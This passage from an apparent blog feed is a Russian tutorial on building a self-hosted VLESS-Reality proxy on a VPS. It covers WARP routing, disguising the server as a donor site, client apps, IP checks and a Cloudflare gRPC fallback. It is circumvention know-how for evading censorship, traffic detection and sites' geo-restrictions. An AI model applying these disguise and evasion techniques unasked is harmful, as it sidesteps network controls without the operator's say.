  <p id="8Oc9"><strong>Шаг 2:</strong> Пустите весь российский трафик на сервере через WARP.<br />Для этого перейдите в раздел &quot;Xray Settings&quot;-&gt;&quot;Routing Rules&quot;, найдите строку где написано &quot;geosite:openai&quot; и отредактируйте её, чтобы получилось: geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai<br />Наконец, добавьте новое правило через кнопку Add Rule (IP: geoip:ru, Outbound tag: WARP) как на скриншоте.<br />Опять сохранитесь вверху страницы (Save Settings), затем перезагрузитесь (Restart Xray)</p>
  <figure id="jQtc" class="m_original">
    <img src="https://nztcdn.com/files/858cd14f-1d82-4c91-b781-fa64f9eca25c.webp" width="826" />
  </figure>
  <p id="9XxI">Правильно заполненная таблица &quot;Routing Rules&quot; - ваш пропуск в интернет, товарищ!</p>
  <p id="CFmB"><strong>Шаг 3:</strong> Найдите сайт‑донор для маскировки.<br />Уже на 4-м шаге панель предложит вам маскироваться под сайт</p>
  <figure id="HVsI" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fs.yimg.com%2Fcv%2Fapiv2%2Fsocial%2Fimages%2Fyahoo_default_logo.png&hash=21cf8be3049bd040e63a02fa8c6d3a08" />
  </figure>
  <p id="3I1r">yahoo.com</p>
  <p id="Rqwc">. В принципе он подходит. Но если у вас сервер в Европе — это даст задержки при открытии новых сайтов, поскольку сервера yahoo находятся в Америке.<br />Оптимальным будет найти сайт в подсети хостера (вот инструкция ), но может случиться так, что в подсети сайта не обнаружится (у меня такое было).<br />Поэтому есть более простой вариант: найти небольшой сайт из той‑же страны, где вы арендовали VPS, затем зайти на сервер по SSH и с сервера попинговать его. Если время отклика будет минимальное (например, 15мс) — он подходит.</p>
  <figure id="prMY" class="m_original">
    <img src="https://nztcdn.com/files/8f87cec0-8569-404f-b2d2-2e81b75e1e69.webp" width="828" />
  </figure>
  <p id="oWjV">Я арендовал сервер в Нидерландах, поэтому выбрал голландский новостной сайт</p>
  <figure id="rbnV" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fnltimes.nl%2Fsites%2Fnltimes.nl%2Ffiles%2Ffavicon-nlt.png&hash=5733eeb9c2b37e923f3609126bbeba0e" />
  </figure>
  <p id="nFVU">- попинговал его с VPS-сервера: вижу время отклика 6мс, он подходит</p>
  <figure id="dL7S" class="m_original">
    <img src="https://nztcdn.com/files/2f723064-cce7-4b6d-861b-44eaf7ed3548.webp" width="398" />
  </figure>
  <p id="V7r6"><strong>Шаг 4:</strong> Настройте VLESS<br />В разделе (Inbound) - (Add inbound) надо заполнить указанные на скриншоте поля.<br />Самое важное:<br /><strong>- Remark и Email</strong> - любые строки (не обязательно адрес эл.почты), ни на что не влияют.<br /><strong>- Listening IP</strong> - укажите ваш IP<br /><strong>- Port</strong> - строго 443, чтобы маскироваться под обычный https-сайт.<br /><strong>- Только после выбора Security: Reality</strong>появится возможность выбора Flow: xtls-rprx-vision<br /><strong>- uTLS</strong> - именно Chrome, чтобы маскироваться под самый популярный браузер<br /><strong>- Dest, Server Names</strong> - указать сайт-донор (хотя можно оставить</p>
  <figure id="texm" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fs.yimg.com%2Fcv%2Fapiv2%2Fsocial%2Fimages%2Fyahoo_default_logo.png&hash=21cf8be3049bd040e63a02fa8c6d3a08" />
  </figure>
  <h3 id="Tbvj"><a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fyahoo.com&hash=3dd52dfb617c23e000a76848ba52fdfe" target="_blank">Yahoo | Mail, Wetter, Suche, Nachrichten, Finanzen, Sport &amp; mehr</a></h3>
  <p id="TPLP">Aktuelle Nachrichten, E-Mail, kostenlose Aktienkurse, Live-Spielstände und -Videos sind nur der Anfang. Bei Yahoo gibt es täglich mehr zu entdecken.</p>
  <p id="qb89">yahoo.com</p>
  <p id="35ug">)<br /><strong>- Кнопка (Get new cert)</strong> генерирует ключи.<br /><strong>- (Create)</strong> завершает создание.</p>
  <figure id="Pw1l" class="m_original">
    <img src="https://nztcdn.com/files/efd6da70-c52b-4c50-b683-bd86462bb53c.webp" width="652" />
  </figure>
  <p id="lbvx"><strong>Шаг 5:</strong> Получите ключ VLESS</p>
  <p id="P8UK">Осталось в разделе Inbounds нажать на (три точки) -&gt; Export Links ...<br />... и система даст скопировать строку-ключ вида:<br /><a href="https://vless//e034d537-b028-41f0-9e53-5f0838ea8b3b@111.111.111.111:443?type=tcp&security=reality&pbk=D0Bfsax3Ble2KiqDrOu3_qMJw7qVKyrnWgpvDTVkb3M&fp=chrome&sni=nltimes.nl&sid=64edf3b5&spx=%2F&flow=xtls-rprx-vision#My%20VLESS-Reality" target="_blank">vless://e034d537-b028-41f0-9e53-5f0838ea8b3b@111.111.111.111:443?type=tcp&amp;security=reality&amp;pbk=D0Bfsax3Ble2KiqDrOu3_qMJw7qVKyrnWgpvDTVkb3M&amp;fp=chrome&amp;sni=nltimes.nl&amp;sid=64edf3b5&amp;spx=%2F&amp;flow=xtls-rprx-vision#My%20VLESS-Reality</a><br />Сохраните её в удобном месте.Инструкция (4/6) - настройка клиента (на компьютерах и телефонах)</p>
  <p id="cJ0R">Здесь всего три шага:</p>
  <ol id="0abv">
    <li id="TODI">Установить приложение</li>
    <li id="1qLr">Вставить туда строку-ключ с сервера</li>
    <li id="UjjS">Настроить прямое соединение с Рунетом</li>
  </ol>
  <p id="joDQ">Приложений много, они есть практически под все платформы, и они проверены временем.<br /><strong>Windows:</strong></p>
  <ul id="xw7B">
    <li id="sccC"><strong>Hiddify-Next</strong> (Новые версии ) (<strong>Проверенная версия 0.11.1</strong> )</li>
    <li id="sx3M">Nekoray</li>
    <li id="xnPE">V2rayN</li>
  </ul>
  <p id="mvtZ"><strong>Android:</strong></p>
  <ul id="tGJy">
    <li id="XKdJ"><strong>Hiddify-Next</strong> (<strong>Play Market</strong> ), (GitHub )</li>
    <li id="m3qo">V2rayNG</li>
    <li id="qjgH">Nekobox</li>
  </ul>
  <p id="tyrn"><strong>iOS:</strong></p>
  <ul id="LTLu">
    <li id="FOxO"><strong>Streisand</strong></li>
    <li id="VXFF">Shadowrocket (платный)</li>
    <li id="AR40">Foxray</li>
  </ul>
  <p id="QrlR"><strong>macOS:</strong></p>
  <ul id="m0rj">
    <li id="RxZw">Hiddify-Next</li>
    <li id="6a6S">FoxRay</li>
    <li id="Ne0t">Streisand</li>
  </ul>
  <p id="pzUF"><strong>Настройка Hiddify-Next</strong></p>
  <p id="hYy9">Лидером среди приложений является <strong>Hiddify‑Next</strong> от наших иранских коллег.<br />Основные его плюсы:</p>
  <ul id="8rBp">
    <li id="vMgN">Крайне простой и понятный интерфейс «одна кнопка», минимум настроек.</li>
    <li id="e8Bj">Русский язык</li>
    <li id="Yt7B">Доступен под все платформы кроме iOS (но разработчики скоро сделают и его)</li>
  </ul>
  <p id="WYd0">Интерфейс настолько простой, что я решил не делать скриншотов.<br />После установки приложения надо сделать всего две вещи:</p>
  <ul id="l9qS">
    <li id="f470">В настройках установить Регион: RU</li>
    <li id="xjUA">Скопировать в буфер и вставить в приложение <strong>строку‑ключ vless</strong> через кнопку (+)</li>
  </ul>
  <p id="v5ln">Всё! Можно нажимать на огромную круглую кнопку — и прокси заработает!<br /><strong>Особенности Hiddify-Next на Windows:</strong><br />Приложение может работать в двух режимах:</p>
  <ul id="tcDr">
    <li id="L0x0">Системный прокси (по умолчанию)</li>
    <li id="fklX">TUN-режим</li>
  </ul>
  <p id="HDvW">Большинство приложений (в том числе браузеры) понимает первый режим. Но не все. Если какое‑то приложение на Windows не видит ваш прокси — переключитесь в TUN‑режим (в настройках Hiddify‑Next). Чтобы TUN‑режим заработал, Hiddify‑Next необходимо запустить в «режиме администратора» (программа сама вам об этом скажет).<br /><strong>Особенности Hiddify‑Next на Android:</strong><br />На андроиде есть супер‑удобная опция «Раздельное проксирование» (в настройках Hiddify‑Next). На iOS такого нет.<br />Раздельное проксирование позволяет выбрать, какие приложения будут использовать прокси. Например, я могу выбрать опцию «<strong>Проксировать только выбранные приложения</strong>» и поставить галочки на: «Нельзяграм, Канву и Хром». После включения прокси, только эти три приложения будут использовать прокси, а остальные (банковские приложения, яндекс‑карты и все остальные) продолжат соединяться со своими серверами напрямую.<br />Если настроить раздельное проксирование для выбранных приложений — прокси на телефоне можно держать включённым <strong>постоянно</strong>.<br /><strong>Настройка Streisand (iOS)</strong></p>
  <p id="8idr"><strong>Streisand — бесплатное приложение</strong>, но в декабре оно на несколько дней становилось платным. Если оно опять станет платным в будущем (~200р) — считаю что оно стоит своих денег.<br />Итак, всё те же два шага:</p>
  <ol id="TpkI">
    <li id="w0yX">Скопировать в буфер и вставить в приложение строку-ключ vless через кнопку (+)</li>
    <li id="ONrt">Настроить прямое соединение с Рунетом. Тут несколько шагов.</li>
  </ol>
  <p id="hdV7">Сначала - скопировать эту длинную строку с настройками в буфер.<br /><a href="https://streisand//aW1wb3J0L3JvdXRlOi8vWW5Cc2FYTjBNRERWQVFJREJBVUdEaGdaR2xWeWRXeGxjMTFrYjIxaGFXNU5ZWFJqYUdWeVZHNWhiV1ZlWkc5dFlXbHVVM1J5WVhSbFozbFVkWFZwWktJSEU5VUlDUW9MREEwT0R4QVNXMjkxZEdKdmRXNWtWR0ZuWFdSdmJXRnBiazFoZEdOb1pYSldaRzl0WVdsdVVtbHdWMjVsZEhkdmNtdFdaR2x5WldOMFZtaDVZbkpwWktDaEVWaG5aVzlwY0RweWRWZDBZM0FzZFdSdzFCUVZDZ3dORGhZU1cyOTFkR0p2ZFc1a1ZHRm5YV1J2YldGcGJrMWhkR05vWlhLaEYxbGtiMjFoYVc0NmNuVlpVbFV0WkdseVpXTjBYRWxRU1daT2IyNU5ZWFJqYUY4UUpFUkROVGxETXpsRExVUXdSRVl0TkRsR015MDVRVEl3TFVFMlJUVkVSakkwUkRaRE9RQUlBQk1BR1FBbkFDd0FPd0JBQUVNQVRnQmFBR2dBYndCeUFIb0FnUUNJQUlrQWl3Q1VBSndBcFFDeEFMOEF3UURMQU5VQTRnQUFBQUFBQUFJQkFBQUFBQUFBQUJzQUFBQUFBQUFBQUFBQUFBQUFBQUVK" target="_blank">streisand://aW1wb3J0L3JvdXRlOi8vWW5Cc2FYTjBNRERWQVFJREJBVUdEaGdaR2xWeWRXeGxjMTFrYjIxaGFXNU5ZWFJqYUdWeVZHNWhiV1ZlWkc5dFlXbHVVM1J5WVhSbFozbFVkWFZwWktJSEU5VUlDUW9MREEwT0R4QVNXMjkxZEdKdmRXNWtWR0ZuWFdSdmJXRnBiazFoZEdOb1pYSldaRzl0WVdsdVVtbHdWMjVsZEhkdmNtdFdaR2x5WldOMFZtaDVZbkpwWktDaEVWaG5aVzlwY0RweWRWZDBZM0FzZFdSdzFCUVZDZ3dORGhZU1cyOTFkR0p2ZFc1a1ZHRm5YV1J2YldGcGJrMWhkR05vWlhLaEYxbGtiMjFoYVc0NmNuVlpVbFV0WkdseVpXTjBYRWxRU1daT2IyNU5ZWFJqYUY4UUpFUkROVGxETXpsRExVUXdSRVl0TkRsR015MDVRVEl3TFVFMlJUVkVSakkwUkRaRE9RQUlBQk1BR1FBbkFDd0FPd0JBQUVNQVRnQmFBR2dBYndCeUFIb0FnUUNJQUlrQWl3Q1VBSndBcFFDeEFMOEF3UURMQU5VQTRnQUFBQUFBQUFJQkFBQUFBQUFBQUJzQUFBQUFBQUFBQUFBQUFBQUFBQUVK</a></p>
  <p id="JfMR">Затем — вставить её в приложение через «+» справа‑вверху.<br />Наконец, зайди в «Роутинг», и там (поставить галочку), (нажать на «включить») и вернуться назад (стрелка слева)</p>
  <figure id="BqYw" class="m_original">
    <img src="https://nztcdn.com/files/3426a735-260f-4c12-b37f-01116fc060e2.webp" width="480" />
  </figure>
  <p id="W0ww">Эффект Streisand: ON<br />Можно подключаться! (при первом подключении телефон попросит пароль).<br />Я ограничил инструкцию двумя приложениями, но если вы захотите поэкспериментировать с другими - в конце статьи будут три ссылки где искать доп. информацию.<br /><em>upd: у меня нет macOS чтобы проверить, но MacOS Hiddify Next на данный момент «не умеет» tun-режим (о tun я писал выше), но это умеет FoxRay.</em>Инструкция (5/6) -- проверка прокси</p>
  <p id="DDsZ">Если вы всё сделали по инструкции — у вас на устройствах уже должен быть работающий прокси. Но выполняет ли он свою функцию? Не обманул ли продавец VPS? Сейчас проверим.</p>
  <ol id="fBfR">
    <li id="VxqE">Убедитесь, что прокси включён.</li>
    <li id="msa6">В браузере зайдите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fipinfo.io%2F&hash=51665dd074d71da2a6b13bdf43942aad" target="_blank">https://ipinfo.io/</a> . Вы видите IP вашего VPS? Значит прокси работает и и вы всё настроили верно.</li>
    <li id="9Z6t">Откройте браузер и зайдите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Frutracker.org&hash=33658b7a6fde430b70d18e54d3c71669" target="_blank">https://rutracker.org</a> . Открывает? Значит блокировка отключена.</li>
    <li id="c8R0">Откройте браузер в режиме инкогнито и зайдите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fmaps.google.com&hash=f309133728c09e41922b9cfd8c0bd40b" target="_blank">https://maps.google.com</a> . Вы видите карту той страны где покупали VPS? Вероятно ip «чистый».</li>
    <li id="ctXo">Ещё раз посмотрите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fipinfo.io%2F&hash=51665dd074d71da2a6b13bdf43942aad" target="_blank">https://ipinfo.io/</a> . Справа в разделе country вы видите ту страну в которой находится VPS? Значит ip «чистый».</li>
    <li id="7Bgt">Зайдите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fcanva.com&hash=fcaa15716c9c8648d3bb046acfdd23e5" target="_blank">https://canva.com</a> Вы видите нормальный сайт и вас не посылают за то что вы из РФ? Значит западную цензуру обошли.</li>
    <li id="KuHr">Зайдите на <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fgoogle.com&hash=e657ab0ffc07976aa3452fcf3de1ef65" target="_blank">https://google.com</a> Нет ошибки 403 и поиск доступен? Значит гугл не забанил ранее ваш IP.</li>
  </ol>
  <p id="iono">Если что‑то пошло не так:</p>
  <ul id="eAgc">
    <li id="QZse">п2 и п3: скорее всего где‑то ошиблись в выполнении инструкции, перепроверьте.</li>
    <li id="jPx5">п4,5,6 — вероятно хостер предоставил вам «грязный» IP, который числится в базах как российский. Есть шанс, что в течение двух недель базы обновятся... либо не обновятся. Имеет смысл написать в техподдержку хостеру, описать ситуацию и попросить поменять IP. Большинство идут на сотрудничество.</li>
    <li id="jBXF">п7 — просите хостера поменять IP.</li>
  </ul>
  <p id="C0rQ"><strong>Запасной план:</strong><br />Если какой‑либо западный сайт не пускает вас к себе через VPS, то <em>в качестве костыля</em> можно пустить трафик до этого сайта через WARP.<br />Для этого в панели 3x-ui-&gt;Xray Settings-&gt;Routing Rules нужно найти и отредактировать строку geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai - дописать сайты через запятую, пример geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai,<a href="https://intel.com/" target="_blank">intel.com</a>,<a href="https://canva.com/" target="_blank">canva.com</a> (обязательно сохраните изменения и перезагрузите Xray)<br />После этого западные сайты вместо IP вашего VPS будут видеть IP сети WARP, что почти наверняка позволит обойти их цензуру.<br /><strong>Да, покупка IP‑адреса — это всегда лотерея и есть небольшой шанс проблем, но чаще всего всё работает с первого раза.</strong>Инструкция (6/6) -- настройка CDN CloudFlare</p>
  <p id="f3wu">Переходим к последнему, самому интересному разделу.<br />Любое управление рисками сводится к трём шагам:</p>
  <ul id="qPx7">
    <li id="kReU">Определить риск (в данном случае, это риск, что рф-цензура заблокирует ваш сервер)</li>
    <li id="Il0L">Минимизировать риск (вы это уже сделали, воплотив знания из &quot;Теории ч3&quot;)</li>
    <li id="1hjv">Определить План Б на тот редкий случай, если риск всё-же реализуется.</li>
  </ul>
  <p id="nBRB"><em>Хотя я не верю, что - с принятой предосторожностью - сервер вообще может быть когда-либо заблокирован, но обычно реальность не интересуется нашими верованиями.</em><br /><strong>Проксирование через CDN - это и есть &quot;План Б&quot;.</strong> Сейчас вы настроите ещё одно, запасное соединение, которое будет работать, даже если ваш VPS станет недоступен изнутри РФ.<br /><strong>Шаг 1:</strong> Выберите продавца доменного имени и убедитесь что доменное имя свободно (см. Теория ч2), но НЕ ПОКУПАЙТЕ его пока. CloudFlare работает только с доменными именами второго уровня (есть исключения, но они нам не помогут). Доменное имя второго уровня — это имя с одной точкой, вроде <a href="https://mypersonalsite.com/" target="_blank">mypersonalsite.com</a> или <a href="https://myhabraproxy.ru/" target="_blank">myhabraproxy.ru</a>.<br />Для этой инструкции я выбрал доменное имя <a href="https://habraproxy.store/" target="_blank">habraproxy.store</a> у продавца Dreamhost. <em>Прямо сейчас dreamhost бесплатно раздаёт доменные <a href="https://xn--80ajiqg.store/" target="_blank">имена.store</a> на 1 год — но эта халява только для клиентов, которые в прошлом что‑то уже покупали.</em><br />Кстати, если у вас уже есть свой сайт с доменом...<br />Итак, продавец выбран, доменное имя выбрано но не куплено, идём дальше.<br /><strong>Шаг 2: </strong>Зарегистрируйтесь на</p>
  <figure id="lew4" class="m_original">
    <img src="https://lolz.live/proxy.php?image=https%3A%2F%2Fcf-assets.www.cloudflare.com%2Fslt3lc6tev37%2F2FNnxFZOBEha1W2MhF44EN%2Fe9438de558c983ccce8129ddc20e1b8b%2FCF_MetaImage_1200x628.png&hash=174f1cc081422fe6e2f7e20566d11bc5" />
  </figure>
  <h3 id="RMUp"><a href="https://lolz.live/proxy.php?link=https%3A%2F%2FCloudFlare.com&hash=cda6366bef738b5e7f9da5eba8dd96bb" target="_blank">Connect, Protect and Build Everywhere | Cloudflare</a></h3>
  <p id="UcN6">(Sign Up — Тариф Free — Add Website — e‑mail+пароль). Сохраните пароль, подтвердите аккаунт по ссылке из письма.</p>
  <figure id="nTJZ" class="m_original">
    <img src="https://nztcdn.com/files/0f965d05-e04c-4004-9bf3-cd877752ec29.webp" width="585" />
  </figure>
  <p id="hJR6"><strong>Шаг 3:</strong> Зайдите в CloudFlare, в верхнем разделе &quot;Websites&quot; добавьте ещё не купленное доменное имя. Далее - Тариф Free - Continue... пока наконец вы не попадёте на страницу &quot;Change your nameservers&quot; с <strong>двумя оранжевыми облаками</strong>.<br />Эти две строки нам понадобятся. Ваши строки могут отличаться от моих.</p>
  <figure id="Bqid" class="m_original">
    <img src="https://nztcdn.com/files/c12205dc-0767-431b-9761-72f4afbebe1a.webp" width="480" />
  </figure>
  <p id="E2Dx">Мы пойдём другим путём<br /><strong>Шаг 4</strong>: Теперь смело покупайте ваше доменное имя, а во время покупки укажите, что будете использовать name-сервера свои, а не те что предлагает продавец. Впишите эти две строки и завершите покупку.<br />На скриншоте - сайт моего продавца.<br />Итак, вы купили домен и указали нужные неймсервера. Активация свежекупленного домена займёт несколько минут, самое время донастроить CloudFlare.<br /><strong>Шаг 6:</strong> В разделе DNS создайте A‑запись для вашего домена и IP вашего сервера. У меня это выглядит вот так:</p>
  <figure id="gZ2H" class="m_original">
    <img src="https://nztcdn.com/files/f1b3a198-d114-4492-be57-b6775533a19a.webp" width="800" />
  </figure>
  <p id="lw0c"><strong>Шаг 7:</strong> В разделе Network включите &quot;gRPC&quot; (обойдусь без скриншота).</p>
  <figure id="ZDAg" class="m_original">
    <img src="https://nztcdn.com/files/8ceb6a3b-8f41-4674-aed2-0a85e0d05cad.webp" width="788" />
  </figure>
  <p id="wZAh"><strong>Шаг 8:</strong> В разделе Rules-&gt;Origin Rules создайте два правила:<br /><strong>(1)</strong> Все запросы на сервер направляйте на порт 54321 (укажите порт, на котором работает ваша панель 3xui)<br /><strong>(2)</strong> Все запросы по секретному адресу /my-gRPC-3049382 (придумайте что-то своё) направляйте на порт 2053<br />Последовательность этих двух правил важна.</p>
  <figure id="kd7G" class="m_original">
    <img src="https://nztcdn.com/files/678a9428-2c57-4b66-a3f4-a3f7036d8fdf.webp" width="640" />
  </figure>
  <p id="NCWi">Нажми на кнопку - получишь результат!<br /><strong>Шаг 9:</strong> Вернитесь на Overview, и если под оранжевыми облаками найдёте кнопку &quot;Check nameservers now&quot; - нажмите её, чтобы поторопить систему.<br /><em>(если прошло много времени и там нет ни облаков, ни кнопки - вообще отлично, переходите к следующему шагу)</em></p>
  <figure id="lBi4" class="m_original">
    <img src="https://nztcdn.com/files/b7953629-0843-42e4-881b-f02a27bd0b01.webp" width="474" />
  </figure>
  <p id="I2a6"><strong>Шаг 9¾:</strong> Создайте второе VLESS-подключение для CDN.<br />Вернитесь в панель 3X-UI. Inbound -Add Inbound<br /><strong>Самое важное:</strong><br /><strong>- Порт</strong> - тот же, что и во &quot;втором правиле&quot;. 2053 или любой другой на ваш выбор (но смысла менять его на другой не вижу).<br /><strong>- Transmission</strong> - gRPC, именно такой тип соединения безлимитен на CloudFlare.<br /><strong>- Service name</strong> - секретная строка из &quot;второго правила&quot; my-gRPC-3049382, но строго без &quot;/&quot; в начале.<br /><strong>- uTLS</strong> - именно Chrome, чтобы маскироваться под самый популярный браузер<br /><strong>- ALPN</strong> сделайте пустым.<br /><strong>- Кнопка (Get Сert from Panel)</strong> вписывает ключи.<br /><strong>- Allow Insecure</strong> - включайте на время тестирования, когда начнёте пользоваться CDN - можно будет выключить.<br />Наконец, проверяйте что получилось. Экспортируйте строку-ключ этого нового соединения и скопируйте её в приложение - <strong>прокси должен работать</strong>. (пока это не CDN, вы лишь подключились к своему VPS через порт 2053 по протоколу VLESS-gRPC, но скоро вместо вас это будет делать CloudFlare)<br /><strong>Шаг 10:</strong> Финальная настройка CloudFlare.</p>
  <figure id="IYQM" class="m_original">
    <img src="https://nztcdn.com/files/a7dfda8f-ca72-457a-8132-4659b2a8c86d.webp" width="747" />
  </figure>
  <p id="I2dN">Каково это, быть избранным?<br />Обновите раздел Overview.<br />CloudFlare должен вас обрадовать сообщением: &quot;<em>Great news! Cludflare is now protecting your site</em>&quot;<br />Если этого сообщения нет, а вместо него - страница, на которой остались два оранжевых облака - значит одно из двух:</p>
  <ul id="vQ6H">
    <li id="Bgww">Нужно ещё немного подождать</li>
    <li id="31A6">Вы что-то сделали не так.</li>
  </ul>
  <figure id="vmrP" class="m_original">
    <img src="https://nztcdn.com/files/dd4d7150-d835-46eb-9eca-408ac4957a9d.webp" width="800" />
  </figure>
  <p id="z3eo">Доквантовая криптография, скриншот начала 21 века<br />Если всё так, тогда: в разделе SSL/TLS включите режим Full<br /><strong>Теперь вы точно завершили настройку CloudFlare.</strong><br /><strong>Шаг 11:</strong> Проверка.<br />Откройте браузер и перейдите по адресу <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fhabraproxy.store%2Fmysecreturl%2F&hash=c4e638543ad8b93a0bfe75ab7247345a" target="_blank">https://habraproxy.store/mysecreturl/</a> (меняйте имя сайта на своё, и адрес страницы на свой - тот что установили для панели 3x-ui).<br /><strong>Откроется панель 3x-ui</strong>. Теперь управлять панелью вы будете с этого адреса!<br />Сохраните этот адрес где-нибудь.<br /><strong>Шаг 12:</strong> Ещё одна проверка.<br />Откройте браузер по адресу <a href="https://lolz.live/proxy.php?link=https%3A%2F%2Fhabraproxy.store&hash=0bd8197f9065edde5a068326caca22fe" target="_blank">https://habraproxy.store</a> и убедитесь, что там пустая страница 404.<br /><em>Это значит любой цензор, зайдя на ваш сайт, убедится: там есть настоящий веб-сервер. В качестве веб-сервера выступает сама панель 3x-ui, которая отдаёт 404 ошибку на любой неизвестный ей адрес. Никакой внешний наблюдатель не узнает адрес панели (</em>/secreturl/<em>). А если цензор послушает трафик, то увидит зашифрованный поток gRPC, который используется для обслуживания веб-приложений по всему интернету.</em><br /><strong>Шаг 13:</strong> Настало время МАГИИ:<br />Отредактируйте строку-ключ второго подключения:</p>
  <ul id="NFrk">
    <li id="k54j">Замените IP на доменное имя,</li>
    <li id="CfuJ">Замените порт на :443,</li>
    <li id="GZCv">Удалите allowInsecure=1</li>
    <li id="tdW4">Отредактируйте имя (после #) по своему желанию</li>
  </ul>
  <p id="1yqR"><strong>Было:</strong> <a href="https://vless//03684ba0-1994-4106-86da-e91fdd9007e0@111.111.111.111:2053?type=grpc&serviceName=my-gRPC-3049382&security=tls&fp=chrome&alpn=&allowInsecure=1#My%20CDN-tjo1gifl" target="_blank">vless://03684ba0-1994-4106-86da-e91fdd9007e0@111.111.111.111:2053?type=grpc&amp;serviceName=my-gRPC-3049382&amp;security=tls&amp;fp=chrome&amp;alpn=&amp;allowInsecure=1#My%20CDN-tjo1gifl</a><br /><strong>Стало:</strong> <a href="https://vless//03684ba0-1994-4106-86da-e91fdd9007e0@habraproxy.store:443?type=grpc&serviceName=my-gRPC-3049382&security=tls&fp=chrome&alpn=&#My%20CDN" target="_blank">vless://03684ba0-1994-4106-86da-e91fdd9007e0@habraproxy.store:443?type=grpc&amp;serviceName=my-gRPC-3049382&amp;security=tls&amp;fp=chrome&amp;alpn=&amp;#My%20CDN</a><br />Наконец, <strong>копируйте эту строку в приложение</strong>, <strong>проверяйте работоспособность</strong> и <strong>наслаждайтесь</strong> запасным каналом для своего прокси.<br />Самое время процитировать @MiraclePtr :<br /><strong>Fair use</strong><br /><em>Понятное дело, что то, что CDN разрешают на своих бесплатных тарифах проксировать Websockets и gRPC — это такой жест доброй воли от них. Давайте не наглеть и использовать эти возможности только в совсем безвыходных случаях, которые, надеюсь, все‑таки не наступят.</em><strong>Недостатки этого решения</strong></p>
  <p id="4sjl"><strong>1. «Сложность» настройки:</strong><br />Безусловно, купить VPN за 100 рублей в месяц намного проще, чем впервые в жизни настроить «вот это всё». Я не строю иллюзий, что «все домохозяйки в стране сделают прокси частью своего хозяйства». Это решение — для небольшого числа людей, которые <em>очень</em> ценят свободу информации, <em>очень</em> ценят надёжность и готовы инвестировать своё внимание во всякое «технарское колдунство».<br /><strong>2. Периодическая недоступность VPS:</strong><br />Uptime бюджетного VPS — <em>примерно</em> 99.9% (бывает и выше, и ниже). Это значит, что примерно 42 минуты в месяц VPS может быть недоступен (иногда эти минуты растягиваются до часов и даже дней). То есть вы гарантированно однажды встретитесь с ситуацией, когда VPS временно не отвечает ни по IP, ни через CDN. Причин множество, я встречался как минимум с этими тремя: факап хостера, DDOS‑атака на хостера, проблемы в дата‑центре где физически находится VPS (на которые сам хостер повлиять не может).<br />Я решаю этот вопрос просто — у меня два сервера от разных хостерах в разных странах (основной и запасной), этого хватает.<br />Другое решение — на случай форс‑мажора иметь под рукой запасную строку‑ключ (shadowsocks, vless, trojan) от какого‑нибудь бесплатного сервиса, благо в телеграмме их полно. Конечно, передавать свой трафик через бесплатный сервис — это стрёмно , но если VPS недоступен, а доступ нужен срочно, то временное использование бесплатного сервиса может оказаться приемлемым, решайте сами.<br /><strong>3. Доверие китайским программистам:</strong><br />Хотя и сервер, и клиенты — это opensource приложения (основанные на Xray и SingBox ), они не проходили независимый аудит, и <em>теоретически</em> там могут быть ошибки, а разработчики — тоже <em>теоретически</em> — могут добавить зловредный код в новые версии (впрочем, такое можно сказать про любое opensource‑решение, но это не мешает существованию опенсорса в мире). Один из вариантов управления этим риском — использовать проверенные версии клиентских и серверных приложений. Пользуясь компьютером и телефоном вы уже доверяете сотням людей и корпораций. Если эти opensource‑решения не вызывают у вас доверия — стоит поискать другие. Я же не вижу здесь никакой проблемы, лишь озвучиваю существующее мнение.<br /><strong>4. Отсутствие XTLS в CDN‑проксировании:</strong><br />Да, моё решение использует XTLS только для соединения с сервером напрямую, и простой TLS для проксирования через CDN. Я не нашёл способа <em>простой</em> настройки XTLS через CDN, но всё же это возможно. В РФ пока не умеют детектировать шифрование уже зашифрованного трафика (tls‑in‑tls), но если научатся — это может быть потенциальной проблемой, хотя я оцениваю этот шанс как стремящийся к нулю.<br /><strong>5. Не анонимность:</strong><br />Да, использование прокси <strong>заметно повышает уровень анонимности</strong> в интернете, но ни один прокси<strong> не гарантирует абсолютной анонимности</strong>. Данное решение не заточено на анонимность, а для свободного доступа к информации. Пожалуйста, не путайте доступ к информации и анонимность, это очень разные задачи.</p>
  <p id="O31M"></p>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="UhXT" data-align="center">БУДУ БЛАГОДАРЕН ЗА КОПЕЕЧКУ!!!</h2>
  </section>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/idapro</guid><link>https://teletype.in/@metasteall/idapro?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/idapro?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Использование IDA Pro</title><pubDate>Wed, 14 Aug 2024 08:28:19 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/8b/dc/8bdc0ba5-7260-482f-b372-37f5b461c071.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://img2.teletype.in/files/d4/4b/d44b8250-23a5-4bb2-ab84-0b6cb337a062.jpeg"></img>IDA Pro — это мощный инструмент для реверс-инжиниринга, который широко используется для анализа бинарных файлов и исследования их структуры. Вот краткое руководство по основным функциям:]]></description><content:encoded><![CDATA[
  <p id="CtNd">IDA Pro — это мощный инструмент для реверс-инжиниринга, который широко используется для анализа бинарных файлов и исследования их структуры. Вот краткое руководство по основным функциям:</p>
  <p id="cFVq"></p>
